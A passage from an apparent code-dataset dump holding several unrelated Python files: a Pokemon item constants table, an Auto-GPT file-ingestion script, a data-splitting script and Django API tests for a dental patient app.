'Tanga_Berry'\r\nCHARTI_BERRY = 'Charti_Berry'\r\nKASIB_BERRY = 'Kasib_Berry'\r\nHABAN_BERRY = 'Haban_Berry'\r\nCOLBUR_BERRY = 'Colbur_Berry'\r\nBABIRI_BERRY = 'Babiri_Berry'\r\nCHILAN_BERRY = 'Chilan_Berry'\r\nLIECHI_BERRY = 'Liechi_Berry'\r\nGANLON_BERRY = 'Ganlon_Berry'\r\nSALAC_BERRY = 'Salac_Berry'\r\nPETAYA_BERRY = 'Petaya_Berry'\r\nAPICOT_BERRY = 'Apicot_Berry'\r\nLANSAT_BERRY = 'Lansat_Berry'\r\nSTARF_BERRY = 'Starf_Berry'\r\nENIGMA_BERRY = 'Enigma_Berry'\r\nMICLE_BERRY = 'Micle_Berry'\r\nCUSTAP_BERRY = 'Custap_Berry'\r\nJABOCA_BERRY = 'Jaboca_Berry'\r\nROWAP_BERRY = 'Rowap_Berry'\r\nGRASS_MAIL = 'Grass_Mail'\r\nFLAME_MAIL = 'Flame_Mail'\r\nBUBBLE_MAIL = 'Bubble_Mail'\r\nBLOOM_MAIL = 'Bloom_Mail'\r\nTUNNEL_MAIL = 'Tunnel_Mail'\r\nSTEEL_MAIL = 'Steel_Mail'\r\nHEART_MAIL = 
'Heart_Mail'\r\nSNOW_MAIL = 'Snow_Mail'\r\nSPACE_MAIL = 'Space_Mail'\r\nAIR_MAIL = 'Air_Mail'\r\nMOSAIC_MAIL = 'Mosaic_Mail'\r\nBRICK_MAIL = 'Brick_Mail'\r\nX_ATTACK = 'X_Attack'\r\nX_ATTACK_2 = 'X_Attack_2'\r\nX_ATTACK_3 = 'X_Attack_3'\r\nX_ATTACK_6 = 'X_Attack_6'\r\nX_DEFENSE = 'X_Defense'\r\nX_DEFENSE_2 = 'X_Defense_2'\r\nX_DEFENSE_3 = 'X_Defense_3'\r\nX_DEFENSE_6 = 'X_Defense_6'\r\nX_SP_ATK = 'X_Sp_Atk'\r\nX_SP_ATK_2 = 'X_Sp_Atk_2'\r\nX_SP_ATK_3 = 'X_Sp_Atk_3'\r\nX_SP_ATK_6 = 'X_Sp_Atk_6'\r\nX_SP_DEF = 'X_Sp_Def'\r\nX_SP_DEF_2 = 'X_Sp_Def_2'\r\nX_SP_DEF_3 = 'X_Sp_Def_3'\r\nX_SP_DEF_6 = 'X_Sp_Def_6'\r\nX_SPEED = 'X_Speed'\r\nX_SPEED_2 = 'X_Speed_2'\r\nX_SPEED_3 = 'X_Speed_3'\r\nX_SPEED_6 = 'X_Speed_6'\r\nX_ACCURACY = 'X_Accuracy'\r\nX_ACCURACY_2 = 'X_Accuracy_2'\r\nX_ACCURACY_3 = 'X_Accuracy_3'\r\nX_ACCURACY_6 = 'X_Accuracy_6'\r\nDIRE_HIT = 'Dire_Hit'\r\nDIRE_HIT_2 = 'Dire_Hit_2'\r\nDIRE_HIT_3 = 'Dire_Hit_3'\r\nGUARD_SPEC = 'Guard_Spec'\r\nRESET_URGE = 'Reset_Urge'\r\nABILITY_URGE = 'Ability_Urge'\r\nITEM_URGE = 'Item_Urge'\r\nITEM_DROP = 'Item_Drop'\r\nBLUE_FLUTE = 'Blue_Flute'\r\nYELLOW_FLUTE = 'Yellow_Flute'\r\nRED_FLUTE = 'Red_Flute'\r\nPOKE_DOLL = 'Poke_Doll'\r\nFLUFFY_TAIL = 'Fluffy_Tail'\r\nPOKE_TOY = 'Poke_Toy'\r\nBICYCLE = 'Bicycle'\r\nOLD_ROD = 'Old_Rod'\r\nGOOD_ROD = 'Good_Rod'\r\nSUPER_ROD = 'Super_Rod'\r\nITEMFINDER = 'Itemfinder'\r\nDOWSING_MACHINE = 'Dowsing_Machine'\r\nPOKE_RADAR = 'Poke_Radar'\r\nTOWN_MAP = 'Town_Map'\r\nPOKE_FLUTE = 'Poke_Flute'\r\nCOIN_CASE = 'Coin_Case'\r\nSOOT_SACK = 'Soot_Sack'\r\nSILPH_SCOPE = 'Silph_Scope'\r\nDEVON_SCOPE = 'Devon_Scope'\r\nSQUIRT_BOTTLE = 'Squirt_Bottle'\r\nSPRAYDUCK = 'Sprayduck'\r\nWAILMER_PAIL = 'Wailmer_Pail'\r\nGRACIDEA = 'Gracidea'\r\nAURORA_TICKET = 'Aurora_Ticket'\r\nOLD_SEA_MAP = 'Old_Sea_Map'\r\nDNA_SPLICERS = 'DNA_Splicers'\r\nREVEAL_GLASS = 'Reveal_Glass'\r\nOVAL_CHARM = 'Oval_Charm'\r\nSHINY_CHARM = 'Shiny_Charm'\r\nICE_STONE = 'Ice_Stone'\r\nJAW_FOSSIL = 'Jaw_Fossil'\r\nSAIL_FOSSIL = 'Sail_Fossil'\r\nRED_NECTAR = 'Red_Nectar'\r\nYELLOW_NECTAR = 'Yellow_Nectar'\r\nPINK_NECTAR = 'Pink_Nectar'\r\nPURPLE_NECTAR = 'Purple_Nectar'\r\nASSAULT_VEST = 'Assault_Vest'\r\nSAFETY_GOGGLES = 'Safety_Goggles'\r\nPROTECTIVE_PADS = 'Protective_Pads'\r\nTERRAIN_EXTENDER = 'Terrain_Extender'\r\nELECTRIC_SEED = 'Electric_Seed'\r\nPSYCHIC_SEED = 'Psychic_Seed'\r\nMISTY_SEED = 'Misty_Seed'\r\nGRASSY_SEED = 'Grassy_Seed'\r\nLUMINOUS_MOSS = 'Luminous_Moss'\r\nSNOWBALL = 'Snowball'\r\nWEAKNESS_POLICY = 'Weakness_Policy'\r\nADRENALINE_ORB = 'Adrenaline_Orb'\r\nPIXIE_PLATE = 'Pixie_Plate'\r\nFAIRY_GEM = 'Fairy_Gem'\r\nFIRE_MEMORY = 'Fire_Memory'\r\nWATER_MEMORY = 'Water_Memory'\r\nELECTRIC_MEMORY = 'Electric_Memory'\r\nGRASS_MEMORY = 'Grass_Memory'\r\nICE_MEMORY = 'Ice_Memory'\r\nFIGHTING_MEMORY = 'Fighting_Memory'\r\nPOISON_MEMORY = 'Poison_Memory'\r\nGROUND_MEMORY = 'Ground_Memory'\r\nFLYING_MEMORY = 'Flying_Memory'\r\nPSYCHIC_MEMORY = 'Psychic_Memory'\r\nBUG_MEMORY = 'Bug_Memory'\r\nROCK_MEMORY = 'Rock_Memory'\r\nGHOST_MEMORY = 'Ghost_Memory'\r\nDRAGON_MEMORY = 'Dragon_Memory'\r\nDARK_MEMORY = 'Dark_Memory'\r\nSTEEL_MEMORY = 'Steel_Memory'\r\nFAIRY_MEMORY = 'Fairy_Memory'\r\nVENUSAURITE = 'Venusaurite'\r\nCHARIZARDITE_X = 'Charizardite_X'\r\nCHARIZARDITE_Y = 'Charizardite_Y'\r\nBLASTOISINITE = 'Blastoisinite'\r\nBEEDRILLITE = 'Beedrillite'\r\nPIDGEOTITE = 'Pidgeotite'\r\nALAKAZITE = 'Alakazite'\r\nSLOWBRONITE = 'Slowbronite'\r\nGENGARITE = 'Gengarite'\r\nKANGASKHANITE = 'Kangaskhanite'\r\nPINSIRITE = 'Pinsirite'\r\nGYARADOSITE = 
'Gyaradosite'\r\nAERODACTYLITE = 'Aerodactylite'\r\nMEWTWONITE_X = 'Mewtwonite_X'\r\nMEWTWONITE_Y = 'Mewtwonite_Y'\r\nAMPHAROSITE = 'Ampharosite'\r\nSTEELIXITE = 'Steelixite'\r\nSCIZORITE = 'Scizorite'\r\nHERACRONITE = 'Heracronite'\r\nHOUNDOOMINITE = 'Houndoominite'\r\nTYRANITARITE = 'Tyranitarite'\r\nSCEPTILITE = 'Sceptilite'\r\nBLAZIKENITE = 'Blazikenite'\r\nSWAMPERTITE = 'Swampertite'\r\nGARDEVOIRITE = 'Gardevoirite'\r\nSABLENITE = 'Sablenite'\r\nMAWILITE = 'Mawilite'\r\nAGGRONITE = 'Aggronite'\r\nMEDICHAMITE = 'Medichamite'\r\nMANECTITE = 'Manectite'\r\nSHARPEDONITE = 'Sharpedonite'\r\nCAMERUPTITE = 'Cameruptite'\r\nALTARIANITE = 'Altarianite'\r\nBANETTITE = 'Banettite'\r\nABSOLITE = 'Absolite'\r\nGLALITITE = 'Glalitite'\r\nSALAMENCITE = 'Salamencite'\r\nMETAGROSSITE = 'Metagrossite'\r\nLATIASITE = 'Latiasite'\r\nLATIOSITE = 'Latiosite'\r\nLOPUNNITE = 'Lopunnite'\r\nGARCHOMPITE = 'Garchompite'\r\nLUCARIONITE = 'Lucarionite'\r\nABOMASITE = 'Abomasite'\r\nGALLADITE = 'Galladite'\r\nAUDINITE = 'Audinite'\r\nDIANCITE = 'Diancite'\r\nRED_ORB = 'Red_Orb'\r\nBLUE_ORB = 'Blue_Orb'\r\nWHIPPED_DREAM = 'Whipped_Dream'\r\nSACHET = 'Sachet'\r\nLUMIOSE_GALETTE = 'Lumiose_Galette'\r\nSHALOUR_SABLE = 'Shalour_Sable'\r\nBIG_MALASADA = 'Big_Malasada'\r\nABILITY_CAPSULE = 'Ability_Capsule'\r\nDREAM_BALL = 'Dream_Ball'\r\nBEAST_BALL = 'Beast_Ball'\r\nTM96 = 'TM96'\r\nTM97 = 'TM97'\r\nTM98 = 'TM98'\r\nTM99 = 'TM99'\r\nTM100 = 'TM100'\r\nROSELI_BERRY = 'Roseli_Berry'\r\nKEE_BERRY = 'Kee_Berry'\r\nMARANGA_BERRY = 'Maranga_Berry'\r\nSPRINKLOTAD = 'Sprinklotad'\r\nPRISON_BOTTLE = 'Prison_Bottle'\r\nN_SOLARIZER = 'N_Solarizer'\r\nN_LUNARIZER = 'N_Lunarizer'\r\nMEGA_RING = 'Mega_Ring'\r\n\r\nITEMS = [REPEL, SUPER_REPEL, MAX_REPEL, BLACK_FLUTE, WHITE_FLUTE, HONEY, ESCAPE_ROPE, RED_SHARD, YELLOW_SHARD,\r\n BLUE_SHARD, GREEN_SHARD, FIRE_STONE, THUNDER_STONE, WATER_STONE, LEAF_STONE, MOON_STONE, SUN_STONE, DUSK_STONE,\r\n DAWN_STONE, SHINY_STONE, RED_APRICORN, YELLOW_APRICORN, BLUE_APRICORN, GREEN_APRICORN, PINK_APRICORN,\r\n WHITE_APRICORN, BLACK_APRICORN, HELIX_FOSSIL, DOME_FOSSIL, OLD_AMBER, ROOT_FOSSIL, CLAW_FOSSIL, SKULL_FOSSIL,\r\n ARMOR_FOSSIL, COVER_FOSSIL, PLUME_FOSSIL, PRETTY_WING, TINY_MUSHROOM, BIG_MUSHROOM, BALM_MUSHROOM, PEARL,\r\n BIG_PEARL, PEARL_STRING, STARDUST, STAR_PIECE, COMET_SHARD, NUGGET, BIG_NUGGET, HEART_SCALE, SLOWPOKE_TAIL,\r\n RARE_BONE, RELIC_COPPER, RELIC_SILVER, RELIC_GOLD, RELIC_VASE, RELIC_BAND, RELIC_STATUE, RELIC_CROWN,\r\n GROWTH_MULCH, DAMP_MULCH, STABLE_MULCH, GOOEY_MULCH, SHOAL_SALT, SHOAL_SHELL, ODD_KEYSTONE, AIR_BALLOON,\r\n BRIGHT_POWDER, EVIOLITE, FLOAT_STONE, DESTINY_KNOT, ROCKY_HELMET, EJECT_BUTTON, RED_CARD, SHED_SHELL,\r\n SMOKE_BALL, LUCKY_EGG, EXP_SHARE, AMULET_COIN, SOOTHE_BELL, CLEANSE_TAG, CHOICE_BAND, CHOICE_SPECS,\r\n CHOICE_SCARF, HEAT_ROCK, DAMP_ROCK, SMOOTH_ROCK, ICY_ROCK, LIGHT_CLAY, GRIP_CLAW, BINDING_BAND, BIG_ROOT,\r\n BLACK_SLUDGE, LEFTOVERS, SHELL_BELL, MENTAL_HERB, WHITE_HERB, POWER_HERB, ABSORB_BULB, CELL_BATTERY, LIFE_ORB,\r\n EXPERT_BELT, METRONOME, MUSCLE_BAND, WISE_GLASSES, RAZOR_CLAW, SCOPE_LENS, WIDE_LENS, ZOOM_LENS, KINGS_ROCK,\r\n RAZOR_FANG, LAGGING_TAIL, QUICK_CLAW, FOCUS_BAND, FOCUS_SASH, FLAME_ORB, TOXIC_ORB, STICKY_BARB, IRON_BALL,\r\n RING_TARGET, MACHO_BRACE, POWER_WEIGHT, POWER_BRACER, POWER_BELT, POWER_LENS, POWER_BAND, POWER_ANKLET,\r\n LAX_INCENSE, FULL_INCENSE, LUCK_INCENSE, PURE_INCENSE, SEA_INCENSE, WAVE_INCENSE, ROSE_INCENSE, ODD_INCENSE,\r\n ROCK_INCENSE, CHARCOAL, MYSTIC_WATER, MAGNET, MIRACLE_SEED, NEVER_MELT_ICE, 
BLACK_BELT, POISON_BARB, SOFT_SAND,\r\n SHARP_BEAK, TWISTED_SPOON, SILVER_POWDER, HARD_STONE, SPELL_TAG, DRAGON_FANG, BLACK_GLASSES, METAL_COAT,\r\n SILK_SCARF, FLAME_PLATE, SPLASH_PLATE, ZAP_PLATE, MEADOW_PLATE, ICICLE_PLATE, FIST_PLATE, TOXIC_PLATE,\r\n EARTH_PLATE, SKY_PLATE, MIND_PLATE, INSECT_PLATE, STONE_PLATE, SPOOKY_PLATE, DRACO_PLATE, DREAD_PLATE,\r\n IRON_PLATE, FIRE_GEM, WATER_GEM, ELECTRIC_GEM, GRASS_GEM, ICE_GEM, FIGHTING_GEM, POISON_GEM, GROUND_GEM,\r\n FLYING_GEM, PSYCHIC_GEM, BUG_GEM, ROCK_GEM, GHOST_GEM, DRAGON_GEM, DARK_GEM, STEEL_GEM, NORMAL_GEM, LIGHT_BALL,\r\n LUCKY_PUNCH, METAL_POWDER, QUICK_POWDER, THICK_CLUB, STICK, SOUL_DEW, DEEP_SEA_TOOTH, DEEP_SEA_SCALE,\r\n ADAMANT_ORB, LUSTROUS_ORB, GRISEOUS_ORB, DOUSE_DRIVE, SHOCK_DRIVE, BURN_DRIVE, CHILL_DRIVE, EVERSTONE,\r\n DRAGON_SCALE, UPGRADE, DUBIOUS_DISC, PROTECTOR, ELECTIRIZER, MAGMARIZER, REAPER_CLOTH, PRISM_SCALE, OVAL_STONE,\r\n RED_SCARF, BLUE_SCARF, PINK_SCARF, GREEN_SCARF, YELLOW_SCARF, POTION, SUPER_POTION, HYPER_POTION, MAX_POTION,\r\n FULL_RESTORE, SACRED_ASH, AWAKENING, ANTIDOTE, BURN_HEAL, PARALYZE_HEAL, ICE_HEAL, FULL_HEAL, LAVA_COOKIE,\r\n OLD_GATEAU, CASTELIACONE, REVIVE, MAX_REVIVE, BERRY_JUICE, RAGE_CANDY_BAR, SWEET_HEART, FRESH_WATER, SODA_POP,\r\n LEMONADE, MOOMOO_MILK, ENERGY_POWDER, ENERGY_ROOT, HEAL_POWDER, REVIVAL_HERB, ETHER, MAX_ETHER, ELIXIR,\r\n MAX_ELIXIR, PP_UP, PP_MAX, HP_UP, PROTEIN, IRON, CALCIUM, ZINC, CARBOS, HEALTH_WING, MUSCLE_WING, RESIST_WING,\r\n GENIUS_WING, CLEVER_WING, SWIFT_WING, RARE_CANDY, MASTER_BALL, ULTRA_BALL, GREAT_BALL, POKE_BALL, SAFARI_BALL,\r\n SPORT_BALL, NET_BALL, DIVE_BALL, NEST_BALL, REPEAT_BALL, TIMER_BALL, LUXURY_BALL, PREMIER_BALL, DUSK_BALL,\r\n HEAL_BALL, QUICK_BALL, CHERISH_BALL, FAST_BALL, LEVEL_BALL, LURE_BALL, HEAVY_BALL, LOVE_BALL, FRIEND_BALL,\r\n MOON_BALL, TM01, TM02, TM03, TM04, TM05, TM06, TM07, TM08, TM09, TM10, TM11, TM12, TM13, TM14, TM15, TM16,\r\n TM17, TM18, TM19, TM20, TM21, TM22, TM23, TM24, TM25, TM26, TM27, TM28, TM29, TM30, TM31, TM32, TM33, TM34,\r\n TM35, TM36, TM37, TM38, TM39, TM40, TM41, TM42, TM43, TM44, TM45, TM46, TM47, TM48, TM49, TM50, TM51, TM52,\r\n TM53, TM54, TM55, TM56, TM57, TM58, TM59, TM60, TM61, TM62, TM63, TM64, TM65, TM66, TM67, TM68, TM69, TM70,\r\n TM71, TM72, TM73, TM74, TM75, TM76, TM77, TM78, TM79, TM80, TM81, TM82, TM83, TM84, TM85, TM86, TM87, TM88,\r\n TM89, TM90, TM91, TM92, TM93, TM94, TM95, HM01, HM02, HM03, HM04, HM05, HM06, CHERI_BERRY, CHESTO_BERRY,\r\n PECHA_BERRY, RAWST_BERRY, ASPEAR_BERRY, LEPPA_BERRY, ORAN_BERRY, PERSIM_BERRY, LUM_BERRY, SITRUS_BERRY,\r\n FIGY_BERRY, WIKI_BERRY, MAGO_BERRY, AGUAV_BERRY, IAPAPA_BERRY, RAZZ_BERRY, BLUK_BERRY, NANAB_BERRY,\r\n WEPEAR_BERRY, PINAP_BERRY, POMEG_BERRY, KELPSY_BERRY, QUALOT_BERRY, HONDEW_BERRY, GREPA_BERRY, TAMATO_BERRY,\r\n CORNN_BERRY, MAGOST_BERRY, RABUTA_BERRY, NOMEL_BERRY, SPELON_BERRY, PAMTRE_BERRY, WATMEL_BERRY, DURIN_BERRY,\r\n BELUE_BERRY, OCCA_BERRY, PASSHO_BERRY, WACAN_BERRY, RINDO_BERRY, YACHE_BERRY, CHOPLE_BERRY, KEBIA_BERRY,\r\n SHUCA_BERRY, COBA_BERRY, PAYAPA_BERRY, TANGA_BERRY, CHARTI_BERRY, KASIB_BERRY, HABAN_BERRY, COLBUR_BERRY,\r\n BABIRI_BERRY, CHILAN_BERRY, LIECHI_BERRY, GANLON_BERRY, SALAC_BERRY, PETAYA_BERRY, APICOT_BERRY, LANSAT_BERRY,\r\n STARF_BERRY, ENIGMA_BERRY, MICLE_BERRY, CUSTAP_BERRY, JABOCA_BERRY, ROWAP_BERRY, GRASS_MAIL, FLAME_MAIL,\r\n BUBBLE_MAIL, BLOOM_MAIL, TUNNEL_MAIL, STEEL_MAIL, HEART_MAIL, SNOW_MAIL, SPACE_MAIL, AIR_MAIL, MOSAIC_MAIL,\r\n BRICK_MAIL, X_ATTACK, X_ATTACK_2, X_ATTACK_3, X_ATTACK_6, X_DEFENSE, 
X_DEFENSE_2, X_DEFENSE_3, X_DEFENSE_6,\r\n         X_SP_ATK, X_SP_ATK_2, X_SP_ATK_3, X_SP_ATK_6, X_SP_DEF, X_SP_DEF_2, X_SP_DEF_3, X_SP_DEF_6, X_SPEED, X_SPEED_2,\r\n         X_SPEED_3, X_SPEED_6, X_ACCURACY, X_ACCURACY_2, X_ACCURACY_3, X_ACCURACY_6, DIRE_HIT, DIRE_HIT_2, DIRE_HIT_3,\r\n         GUARD_SPEC, RESET_URGE, ABILITY_URGE, ITEM_URGE, ITEM_DROP, BLUE_FLUTE, YELLOW_FLUTE, RED_FLUTE, POKE_DOLL,\r\n         FLUFFY_TAIL, POKE_TOY, BICYCLE, OLD_ROD, GOOD_ROD, SUPER_ROD, ITEMFINDER, DOWSING_MACHINE, POKE_RADAR,\r\n         TOWN_MAP, POKE_FLUTE, COIN_CASE, SOOT_SACK, SILPH_SCOPE, DEVON_SCOPE, SQUIRT_BOTTLE, SPRAYDUCK, WAILMER_PAIL,\r\n         GRACIDEA, AURORA_TICKET, OLD_SEA_MAP, DNA_SPLICERS, REVEAL_GLASS, OVAL_CHARM, SHINY_CHARM, ICE_STONE,\r\n         JAW_FOSSIL, SAIL_FOSSIL, RED_NECTAR, YELLOW_NECTAR, PINK_NECTAR, PURPLE_NECTAR, ASSAULT_VEST, SAFETY_GOGGLES,\r\n         PROTECTIVE_PADS, TERRAIN_EXTENDER, ELECTRIC_SEED, PSYCHIC_SEED, MISTY_SEED, GRASSY_SEED, LUMINOUS_MOSS,\r\n         SNOWBALL, WEAKNESS_POLICY, ADRENALINE_ORB, PIXIE_PLATE, FAIRY_GEM, FIRE_MEMORY, WATER_MEMORY, ELECTRIC_MEMORY,\r\n         GRASS_MEMORY, ICE_MEMORY, FIGHTING_MEMORY, POISON_MEMORY, GROUND_MEMORY, FLYING_MEMORY, PSYCHIC_MEMORY,\r\n         BUG_MEMORY, ROCK_MEMORY, GHOST_MEMORY, DRAGON_MEMORY, DARK_MEMORY, STEEL_MEMORY, FAIRY_MEMORY, VENUSAURITE,\r\n         CHARIZARDITE_X, CHARIZARDITE_Y, BLASTOISINITE, BEEDRILLITE, PIDGEOTITE, ALAKAZITE, SLOWBRONITE, GENGARITE,\r\n         KANGASKHANITE, PINSIRITE, GYARADOSITE, AERODACTYLITE, MEWTWONITE_X, MEWTWONITE_Y, AMPHAROSITE, STEELIXITE,\r\n         SCIZORITE, HERACRONITE, HOUNDOOMINITE, TYRANITARITE, SCEPTILITE, BLAZIKENITE, SWAMPERTITE, GARDEVOIRITE,\r\n         SABLENITE, MAWILITE, AGGRONITE, MEDICHAMITE, MANECTITE, SHARPEDONITE, CAMERUPTITE, ALTARIANITE, BANETTITE,\r\n         ABSOLITE, GLALITITE, SALAMENCITE, METAGROSSITE, LATIASITE, LATIOSITE, LOPUNNITE, GARCHOMPITE, LUCARIONITE,\r\n         ABOMASITE, GALLADITE, AUDINITE, DIANCITE, RED_ORB, BLUE_ORB, WHIPPED_DREAM, SACHET, LUMIOSE_GALETTE,\r\n         SHALOUR_SABLE, BIG_MALASADA, ABILITY_CAPSULE, DREAM_BALL, BEAST_BALL, TM96, TM97, TM98, TM99, TM100,\r\n         ROSELI_BERRY, KEE_BERRY, MARANGA_BERRY, SPRINKLOTAD, PRISON_BOTTLE, N_SOLARIZER, N_LUNARIZER, MEGA_RING]\r\n\r\nITEM_TABLE = {}\r\nfor it in ITEMS:\r\n    ITEM_TABLE[it.replace(\"_\", \" \")] = it\r\n\r\ndef get_item(name):\r\n    try:\r\n        return ITEM_TABLE[name]\r\n    except KeyError:\r\n        print(\"No Item.\")\r\n        return None\r\n\r\n#print(get_item('Choice Band'))","repo_name":"JanOkke/PokemonAI","sub_path":"items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":24601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42638628889","text":"import argparse\nimport logging\n\nfrom autogpt.config import Config\nfrom autogpt.file_operations import ingest_file, search_files\nfrom autogpt.memory import get_memory\n\ncfg = Config()\n\n\ndef configure_logging():\n    logging.basicConfig(\n        filename=\"log-ingestion.txt\",\n        filemode=\"a\",\n        format=\"%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s\",\n        datefmt=\"%H:%M:%S\",\n        level=logging.DEBUG,\n    )\n    return logging.getLogger(\"AutoGPT-Ingestion\")\n\n\ndef ingest_directory(directory, memory, args):\n    \"\"\"\n    Ingest all files in a directory by calling ingest_file on each of them.\n\n    :param directory: The directory containing the files to ingest\n    :param memory: An object with an add() method used to store chunks in memory\n    \"\"\"\n    try:\n        files = search_files(directory)\n        for file in files:\n            ingest_file(file, memory, args.max_length, args.overlap)\n    except Exception as e:\n        print(f\"Error while ingesting directory '{directory}': {str(e)}\")\n\n\ndef main() -> None:\n    logger = configure_logging()\n\n    parser = 
argparse.ArgumentParser(\n        description=\"Ingest a file or a directory with multiple files into memory. \"\n        \"Make sure to set your .env before running this script.\"\n    )\n    group = parser.add_mutually_exclusive_group(required=True)\n    group.add_argument(\"--file\", type=str, help=\"The file to ingest.\")\n    group.add_argument(\n        \"--dir\", type=str, help=\"The directory containing the files to ingest.\"\n    )\n    parser.add_argument(\n        \"--init\",\n        action=\"store_true\",\n        help=\"Init the memory and wipe its content (default: False)\",\n        default=False,\n    )\n    parser.add_argument(\n        \"--overlap\",\n        type=int,\n        help=\"The overlap size between chunks when ingesting files (default: 200)\",\n        default=200,\n    )\n    parser.add_argument(\n        \"--max_length\",\n        type=int,\n        help=\"The max_length of each chunk when ingesting files (default: 4000)\",\n        default=4000,\n    )\n\n    args = parser.parse_args()\n\n    # Initialize memory\n    memory = get_memory(cfg, init=args.init)\n    print(\"Using memory of type: \" + memory.__class__.__name__)\n\n    if args.file:\n        try:\n            ingest_file(args.file, memory, args.max_length, args.overlap)\n            print(f\"File '{args.file}' ingested successfully.\")\n        except Exception as e:\n            logger.error(f\"Error while ingesting file '{args.file}': {str(e)}\")\n            print(f\"Error while ingesting file '{args.file}': {str(e)}\")\n    elif args.dir:\n        try:\n            ingest_directory(args.dir, memory, args)\n            print(f\"Directory '{args.dir}' ingested successfully.\")\n        except Exception as e:\n            logger.error(f\"Error while ingesting directory '{args.dir}': {str(e)}\")\n            print(f\"Error while ingesting directory '{args.dir}': {str(e)}\")\n    else:\n        print(\n            \"Please provide either a file path (--file) or a directory name (--dir) inside the auto_gpt_workspace directory as input.\"\n        )\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"Chenluckly/Auto-GPT-ZH-master","sub_path":"autogpt/data_ingestion.py","file_name":"data_ingestion.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"40560625470","text":"from pandas import read_csv\nimport numpy as np\n\n### Loading in the data ###\nTEST_PERCENTAGE = 0.15\nVAL_PERCENTAGE = 0.1\n\ndata = read_csv(\"./data_3.txt\", header = None).to_numpy(copy=True)\nnp.random.shuffle(data)\n\nval_end = int(len(data) * VAL_PERCENTAGE)\ntest_end = val_end + int(len(data) * TEST_PERCENTAGE)\nvalx = data[:val_end,:17]\nvaly = data[:val_end,17:]\ntestx = data[val_end:test_end,:17]\ntesty = data[val_end:test_end,17:]\ntrainx = data[test_end:,:17]\ntrainy = data[test_end:,17:]\n\nprint(f\"Training: {len(trainx)} Validation: {len(valx)} Test: {len(testx)}\")\ninput()","repo_name":"AtesIsf/SACPhoenix","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10485979013","text":"# -*- coding:utf-8 -*-\nfrom django.contrib.auth.models import Permission\nimport pytest\nfrom faker import Faker\nfrom mixer.backend.django import mixer\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\nfrom rest_framework_jwt.settings import api_settings\nfrom django.test import TestCase\nfrom django.core.files.uploadedfile import SimpleUploadedFile\n\nfrom userapp.models import User\nfrom patientapp.models import Patient\nfrom addressapp.models import Geography, ActivityArea\n\npytestmark = pytest.mark.django_db\njwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER\njwt_encode_handler = api_settings.JWT_ENCODE_HANDLER\nfake = Faker()\n\n\nclass TestPatientListView(TestCase):\n    def test_list_patient(self):\n        client = APIClient()\n        # un authorized access by 
user\n response = client.post('/api/v1/patients')\n assert response.status_code == 401, 'Un authorized access denied.'\n\n # authorized user\n user_obj = mixer.blend(User)\n payload = jwt_payload_handler(user_obj)\n token = jwt_encode_handler(payload)\n client.credentials(HTTP_AUTHORIZATION='JWT ' + token)\n response = client.get('/api/v1/patients',format='json')\n print(response)\n assert response.status_code == 204, 'patients content not found'\n\n # authorized user\n user_obj = mixer.blend(User,admin=True)\n payload = jwt_payload_handler(user_obj)\n token = jwt_encode_handler(payload)\n client.credentials(HTTP_AUTHORIZATION='JWT ' + token)\n response = client.get('/api/v1/patients',format='json')\n print(response)\n assert response.status_code == 200, 'patients list for admin'\n\n # # authorized user\n # user_obj = mixer.blend(User)\n # geography_obj = mixer.blend(Geography)\n # activityarea_obj = mixer.blend(ActivityArea)\n # patients_obj = mixer.blend(Patient,author=user_obj,geography=geography_obj,activity_area=activityarea_obj)\n # payload = jwt_payload_handler(user_obj)\n # token = jwt_encode_handler(payload)\n # client.credentials(HTTP_AUTHORIZATION='JWT ' + token)\n # response = client.get('/api/v1/patients',format='json')\n # print(response)\n # assert response.status_code == 200, 'patients list for users'\n\n def test_post_patient(self):\n activityarea_obj = mixer.blend(ActivityArea)\n geography_obj = mixer.blend(Geography)\n client = APIClient()\n\n # un authorized access by user\n response = client.post('/api/v1/patients')\n assert response.status_code == 401, 'Un authorized access denied.'\n\n # authorized user\n user_obj = User.objects.create(email=fake.email(),\\\n first_name=fake.name(),last_name=fake.name())\n payload = jwt_payload_handler(user_obj)\n token = jwt_encode_handler(payload)\n client.credentials(HTTP_AUTHORIZATION='JWT ' + token)\n response = client.post('/api/v1/patients', {'first_name':fake.name(),\\\n 'last_name':fake.name(),'gender':'male','dob':'1996-03-21',\\\n 'phone':\"2312164654\",'education':'bachelor',\\\n 'author':str(user_obj),'latitude':'12',\\\n 'longitude':'21','country':fake.name(),\\\n 'city':fake.name(),'state':fake.name(),\\\n 'street_address':fake.name(),'ward':12,\\\n 'activityarea_id':str(activityarea_obj.id),\\\n 'geography_id':str(geography_obj.id),\n 'id':fake.name(),\n 'middle_name':fake.name(),\n 'marital_status':'single'},format='json')\n assert response.status_code == 200, 'patients created'\n\n\n # serializers error\n user_obj = User.objects.create(email=fake.email(),\\\n first_name=fake.name(),last_name=fake.name())\n payload = jwt_payload_handler(user_obj)\n token = jwt_encode_handler(payload)\n client.credentials(HTTP_AUTHORIZATION='JWT ' + token)\n response = client.post('/api/v1/patients', {'first_name':'',\\\n 'last_name':fake.name(),'gender':'male','dob':'1996-03-21',\\\n 'phone':\"2312164654\",'education':'bachelor',\\\n 'author':str(user_obj),'latitude':'12',\\\n 'longitude':'21','country':fake.name(),\\\n 'city':fake.name(),'state':fake.name(),'street_address':fake.name(),'ward':12},format='json')\n assert response.status_code == 400, 'serializers error'\n\n","repo_name":"AbhiyantrikTechnology/DentalHub-Backend","sub_path":"patientapp/test/api/test_patientapi.py","file_name":"test_patientapi.py","file_ext":"py","file_size_in_byte":4427,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"23366879922","text":"import asyncio\nimport logging\nimport os\nfrom typing 
